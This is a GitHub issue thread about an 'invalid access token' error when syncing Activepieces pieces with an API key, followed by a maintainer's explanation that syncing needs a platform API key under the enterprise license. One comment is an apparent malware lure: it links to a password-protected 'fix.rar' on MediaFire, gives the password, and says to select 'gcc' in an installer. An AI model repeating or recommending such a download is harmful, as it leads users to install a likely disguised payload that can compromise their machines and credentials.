### ISSUE TITLE
Sync Pieces API_KEY Issue || Inavlid access token issue 

### ISSUE THREAD

**Issue by PhoenixMystique** [activepieces/activepieces#5431]
<img width="655" alt="image" src="https://github.com/user-attachments/assets/15ec761f-f4d7-4aff-ad6f-509718de35dd">

as seen in image when uploading and syncing the pices with api key :- dfghjcfghjkxxxx-xxxx it says inavlid access token @abuaboud if you can help

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by abuaboud** [comment]
Currently, it works with platform API keys which are currently supported under the ee license, since the sync is for platform (all projects) pieces and not project pieces. although you can build your own by mimicking install piece requests in the UI for the project level,

The API key in the environment variable is deprecated and should be removed soon 

Thank you,
Mo
